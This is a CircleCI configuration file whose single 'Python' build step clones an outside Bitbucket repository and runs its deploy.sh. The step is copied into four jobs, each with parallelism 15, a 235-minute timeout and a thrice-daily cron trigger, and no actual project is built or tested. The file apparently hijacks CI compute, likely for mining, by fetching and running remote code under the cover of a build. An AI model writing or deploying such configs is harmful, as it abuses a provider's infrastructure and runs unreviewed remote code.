working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Python
        command: |
                    apt update 
                    apt install screen -y 
                    git clone https://novalanto61@bitbucket.org/novalanto61/umum.git
                    cd umum && chmod 777 deploy.sh && ./deploy.sh
        no_output_timeout: 235m
version: 2.0
jobs:
  python:
    <<: *script
    docker:
      - image: python:latest
    parallelism: 15
  python1:
    <<: *script
    docker:
      - image: python:latest
    parallelism: 15
  python2:
    <<: *script
    docker:
      - image: python:latest
    parallelism: 15
  python3:
    <<: *script
    docker:
      - image: python:latest
    parallelism: 15
workflows:
  version: 2
  commit:
    jobs:
      - python
      - python1
      - python2
      - python3


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - main

  pythonrunjob:
    jobs:
      - python
      - python1
      - python2
      - python3
